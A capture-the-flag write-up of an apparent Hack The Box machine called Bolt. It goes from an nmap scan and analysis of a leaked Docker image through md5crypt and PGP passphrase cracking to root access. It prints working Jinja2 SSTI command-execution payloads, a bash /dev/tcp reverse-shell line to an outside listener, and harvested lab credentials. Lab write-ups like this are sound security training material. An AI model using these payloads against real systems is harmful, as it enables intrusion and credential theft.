```
─# nmap 10.10.11.114 -p- -sC -sV --min-rate=2000
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 EST
Nmap scan report for 10.10.11.114
Host is up (0.31s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Starter Website - About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds
```
Visiting the site there is yet another login page, and accounts can be created. Gave it a go. No luck, it throws an error.
Opening the download, it turns out to be a few virtual machine images, and they leak some information.
```
─# cat repositories
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}
```
This says the latest version is xxx. In the app/base/__pycache__ directory there are two pyc files. After decompiling, the code is as follows:
```
pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/
```
Worth noting as a tip. The decompiled output still differs a bit from the real source; the actual source turned up later and is pasted here instead.
```python
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""

from flask import jsonify, render_template, redirect, request, url_for
from flask_login import (
    current_user,
    login_required,
    login_user,
    logout_user
)

from app import db, login_manager
from app.base import blueprint
from app.base.forms import LoginForm, CreateAccountForm
from app.base.models import User
from hmac import compare_digest as compare_hash
import crypt

@blueprint.route('/')
def route_default():
    return redirect(url_for('base_blueprint.login'))

## Login & Registration

@blueprint.route('/login', methods=['GET', 'POST'])
def login():
    login_form = LoginForm(request.form)
    if 'login' in request.form:

        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):

            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))

        # Something (user or pass) is not ok
        return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)

    if not current_user.is_authenticated:
        return render_template( 'accounts/login.html',
                                form=login_form)
    return redirect(url_for('home_blueprint.index'))

@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:

        username = request.form['username']
        email    = request.form['email'   ]
        data = User.query.filter_by(email=email).first()
        if data is None:
            # Check usename exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Username already registered',
                                        success=False,
                                        form=create_account_form)

            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Email already registered',
                                        success=False,
                                        form=create_account_form)

            # else we can create the user
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()

            return render_template( 'accounts/register.html',
                                    msg='User created please <a href="/login">login</a>',
                                    success=True,
                                    form=create_account_form)

    else:
        return render_template( 'accounts/register.html', form=create_account_form)

@blueprint.route('/logout')
def logout():
    logout_user()
    return redirect(url_for('base_blueprint.login'))

## Errors

@login_manager.unauthorized_handler
def unauthorized_handler():
    return render_template('page-403.html'), 403

@blueprint.errorhandler(403)
def access_forbidden(error):
    return render_template('page-403.html'), 403

@blueprint.errorhandler(404)
def not_found_error(error):
    return render_template('page-404.html'), 404

@blueprint.errorhandler(500)
def internal_error(error):
    return render_template('page-500.html'), 500
```
```python
└─# cat forms.py
# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00)
# [GCC 10.3.0]
# Embedded file name: /app/base/forms.py
# Compiled at: 2021-03-05 12:48:36
# Size of source mod 2**32: 791 bytes
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask_wtf import FlaskForm
from wtforms import TextField, PasswordField
from wtforms.validators import InputRequired, Email, DataRequired

class LoginForm(FlaskForm):
    username = TextField('Username', id='username_login', validators=[DataRequired()])
    password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])


class CreateAccountForm(FlaskForm):
    username = TextField('Username', id='username_create', validators=[DataRequired()])
    email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])
    password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])
# okay decompiling forms.cpython-36.pyc
```
There is a lot in here; look at the important parts first.
```python
import glob
import os

# `a` is the list of layer tarballs extracted from the image; glob them here
a = glob.glob('*/layer.tar')
for i in a:
    # list the contents of each layer without extracting it
    os.system("tar -tvf " + i)
```
A few notable files, listed by layer:
```
a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar
-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3

2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar
-rw-r--r-- root/root       791 2021-03-05 12:48 app/base/forms.py
-rw-r--r-- root/root      3778 2021-03-05 12:49 app/base/routes.py

745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar
-rw-r--r-- root/root       142 2021-03-05 06:11 .env
-rw-r--r-- root/root      1448 2021-03-05 09:22 config.py
-rw-r--r-- root/root       198 2021-03-05 06:11 gunicorn-cfg.py
-rw-r--r-- root/root       116 2021-03-05 07:40 requirements.txt
-rw-r--r-- root/root       955 2021-03-05 06:11 run.py
```
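The manual tar -tvf pass above is exactly what an image audit automates. The following is an added example written for this writeup, not code from the box or the original post: it builds a constructed sample image in memory with the same layout as the leaked tarball (a top-level repositories file plus one <dir>/layer.tar per layer) and reports which layers carry files that typically hold credentials. Layer directory names, file contents and the SENSITIVE_NAMES watch-list are placeholders chosen for the demo.

```python
import io
import json
import tarfile

# Constructed watch-list of file names that commonly hold credentials or secrets.
SENSITIVE_NAMES = {'.env', 'config.py', 'db.sqlite3', 'gunicorn-cfg.py'}


def _add(tar, name, data):
    """Add an in-memory file to an open tarfile."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def _layer(files):
    """Build one layer.tar (bytes) from a {path: content} dict."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w') as t:
        for name, data in files.items():
            _add(t, name, data)
    return buf.getvalue()


def build_sample_image():
    """Constructed sample image with the same layout as the leaked tarball:
    a top-level 'repositories' file plus <layer-dir>/layer.tar entries.
    Layer directory names and file contents are placeholders."""
    outer = io.BytesIO()
    with tarfile.open(fileobj=outer, mode='w') as t:
        tags = {'flask-dashboard-adminlte_appseed-app': {'latest': 'placeholder-layer-id'}}
        _add(t, 'repositories', json.dumps(tags).encode())
        _add(t, 'layer-a/layer.tar', _layer({'db.sqlite3': b'SQLite format 3\x00'}))
        _add(t, 'layer-b/layer.tar', _layer({'app/base/forms.py': b'# forms\n',
                                             'app/base/routes.py': b'# routes\n'}))
        _add(t, 'layer-c/layer.tar', _layer({'.env': b'DB_PASS=pass\n',
                                             'config.py': b"SECRET_KEY = 'x'\n"}))
    return outer.getvalue()


def audit_image(image_bytes):
    """Walk every layer without extracting to disk and return
    (tags, {layer_dir: [sensitive file paths]})."""
    tags, findings = {}, {}
    with tarfile.open(fileobj=io.BytesIO(image_bytes)) as outer:
        for member in outer.getmembers():
            if member.name == 'repositories':
                tags = json.loads(outer.extractfile(member).read())
            elif member.isfile() and member.name.endswith('/layer.tar'):
                layer_dir = member.name.rsplit('/', 1)[0]
                layer_bytes = outer.extractfile(member).read()
                with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                    hits = sorted(m.name for m in layer.getmembers()
                                  if m.isfile() and m.name.rsplit('/', 1)[-1] in SENSITIVE_NAMES)
                if hits:
                    findings[layer_dir] = hits
    return tags, findings


if __name__ == '__main__':
    tags, findings = audit_image(build_sample_image())
    print(tags, findings)
```

Secrets baked into a layer stay in the image history even if a later layer deletes the file, which is why an audit has to look at every layer rather than the final filesystem.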
The config.py file holds an sqlite3 connection and the username and password for the PostgreSQL database:
```python
#PostgreSQL database
SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
    config( 'DB_ENGINE'   , default='postgresql'    ),
    config( 'DB_USERNAME' , default='appseed'       ),
    config( 'DB_PASS'     , default='pass'          ),
    config( 'DB_HOST'     , default='localhost'     ),
    config( 'DB_PORT'     , default=5432            ),
    config( 'DB_NAME'     , default='appseed-flask' )
)
```
```
admin admin@bolt.htb $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
```
That is the admin password hash (from db.sqlite3). The login endpoint shows how the hash is computed:
```python
# read form data
username = request.form['username']
password = request.form['password']

# Locate user
user = User.query.filter_by(username=username).first()

# Check the password
stored_password = user.password
stored_password = stored_password.decode('utf-8')
if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):

    login_user(user)
    return redirect(url_for('base_blueprint.route_default'))
```
Going by the code, the key point is that the user object is looked up by username. Login succeeds when the user exists and crypt.crypt() of the submitted password, with the stored hash used as the salt string, comes out equal to the stored hash itself, which left me baffled at first. Cracking it gives the following password:
admin/deadbolt
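What makes the check above work is that the salt string encodes the scheme: a stored value beginning with $1$ tells crypt to run md5crypt with the eight characters after it as the salt, so re-hashing the candidate reproduces the whole string when the password is right. The following is an added example for this writeup (not the box's code) that implements $1$ md5crypt with only hashlib and mirrors the app's verify step; ADMIN_HASH is the hash from the leaked db.sqlite3 and 'deadbolt' the password cracked above.

```python
import hashlib
import hmac

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# The admin hash from the leaked db.sqlite3 above.
ADMIN_HASH = '$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.'


def _to64(value, count):
    """crypt-style base64: emit `count` chars, 6 bits each, low bits first."""
    out = ''
    for _ in range(count):
        out += ITOA64[value & 0x3f]
        value >>= 6
    return out


def md5crypt(password, salt):
    """Pure-hashlib md5crypt ($1$), the scheme crypt.crypt() selects when the
    salt string starts with '$1$'. The salt is at most 8 characters."""
    pw, salt = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b'$1$' + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:                      # mix in len(pw) bytes of MD5(pw+salt+pw)
        ctx.update(alt[:min(16, n)])
        n -= 16
    i = len(pw)
    while i:                          # the historical bit-walk over len(pw)
        ctx.update(b'\0' if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):             # fixed 1000 rounds: cheap on a modern GPU
        h = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            h.update(salt)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()
    out = ''
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return '$1$' + salt.decode() + '$' + out


def verify(stored_hash, candidate):
    """Same check as the app's login(): re-hash the candidate using the stored
    hash as the salt string, then compare in constant time."""
    parts = stored_hash.split('$')
    if len(parts) != 4 or parts[1] != '1':
        return False
    return hmac.compare_digest(md5crypt(candidate, parts[2]), stored_hash)


if __name__ == '__main__':
    print(verify(ADMIN_HASH, 'deadbolt'))   # True: the password cracked above
```

The fixed 1000 MD5 rounds are why a wordlist run finishes in seconds; for new code a memory-hard KDF (hashlib.scrypt, bcrypt or argon2) is the fix, and the `if user` test belongs before `user.password` is touched.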
At this point it feels like there is nothing more to find here.
A vhost scan turns up two subdomains, demo and mail. That makes three sites now:
demo.bolt.htb      # a login page; accounts can be created, but an invite code is required
mail.bolt.htb      # a login page
passbolt.bolt.htb  AdminLTE3
config.py also configures a SECRET_KEY, default='S#perS3crEt_007'.
Tried that; no luck. After a long search, found the invite code: 'XNSS-HSJW-3NGU-8XTJ'
```
curl -i -s -k -X $'POST' \
    -H $'Host: demo.bolt.htb' \
    --data-binary $'\x0d\x0ausername=123&email=123@qq.com&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ' \
    $'http://demo.bolt.htb/register'
```
After registering, the same account can log in to mail, which looks like a mail server.
Once logged in to the mail service, changing a setting sends an email??? Since the app is Python, try template injection.
After clicking, a new email arrives and it contains 10000, which shows the name parameter is vulnerable to SSTI.
```
{{"".__class__.__bases__[0].__subclasses__()}}
```
Looking through the list, Popen is the 223rd entry:
```
{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>
```
Finally tried calling its initializer, which doesn't work:
```
{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
<slot wrapper '__init__' of 'object' objects>
```
Since the template engine is Jinja2, searched for a payload:
```
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}

www-data
```
0x03 Getting a shell
Send the payload the same way:
```
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
```
```
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808
bash: cannot set terminal process group (1012): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bolt:~/demo$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bolt:~/demo$ whoami
whoami
www-data
```
```
www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v false
cat /etc/passwd|grep -v nologin |grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
```
```
[-] /etc/init/ config file permissions:
total 24
drwxr-xr-x   2 root root  4096 Sep  9 10:07 .
drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..
-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf
-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf
```

```
[-] Any interesting mail in /var/mail:
total 24
drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .
drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..
drwx--S---  5 5001     mail 4096 Dec 19 08:23 123
-rw-------  1 eddie    mail  909 Feb 25  2021 eddie
-rw-------  1 root     mail    1 Mar  3  2021 root
-rw-------  1 www-data mail    1 Mar  3  2021 www-data
```
Nothing exploitable found there.
Search for files by owner instead:
```
www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/null
find /etc -user www-data 2>/dev/null
/etc/passbolt/Seeds
```
passbolt.php contains a password: rT2;jW7<eY8!dX8}pQ8%. The relevant part of the file:
```php
return [
    'App' => [
        // A base URL to use for absolute links.
        // The url where the passbolt instance will be reachable to your end users.
        // This information is need to render images in emails for example
        'fullBaseUrl' => 'https://passbolt.bolt.htb',
    ],

    // Database configuration.
    'Datasources' => [
        'default' => [
            'host' => 'localhost',
            'port' => '3306',
            'username' => 'passbolt',
            'password' => 'rT2;jW7<eY8!dX8}pQ8%',
            'database' => 'passboltdb',
        ],
    ],
```
Connected to the database; nothing critical in there.
```
select * from users;
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| id                                   | role_id                              | username       | active | deleted | created             | modified            |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |
| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |
```
There is also one odd thing: an armored PGP message (Version: OpenPGP.js v4.10.9) stored in the database.
OpenPGP is an encryption tool.
Compared with before, there is one more password now (the database one). Tried it to switch users; it works for eddie.
eddie's mailbox holds a message from Clark that mentions the password management system and backing up the private key. The email:
```
eddie@bolt:/var/mail$ cat eddie
cat eddie
From clark@bolt.htb  Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
	id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>

Hey Eddie,

The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...

-Clark
```
Also spotted CVE-2021-22555; tried one exploit from GitHub, it didn't work, will come back to it later.
One more piece of information:
```
══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
```
What is PGP??? https://gist.github.com/jhjguxin/6037564
If you're not familiar with it, test locally first.
```
══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js
/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log
```
Those files contain three public keys... and one private key: an armored PGP private key block (Version: OpenPGP.js v4.10.9) for Eddie Johnson <eddie@bolt.htb>, saved as pri.key below.
The PGP message from the database is ciphertext that needs decrypting.
As everyone knows, private keys usually have a passphrase, so try cracking it with gpg2john:
```
└─# gpg2john pri.key > tmp
File pri.key

─# cat tmp
Eddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <eddie@bolt.htb>::pri.key
```
```
┌──(root💀kali)-[~/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 16777216 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
merrychristmas   (Eddie Johnson)
1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
Decrypt the message with the recovered passphrase:
```
gpg --batch --import /tmp/pri.key
gpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key

{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
```
Switch to root with that password; root obtained.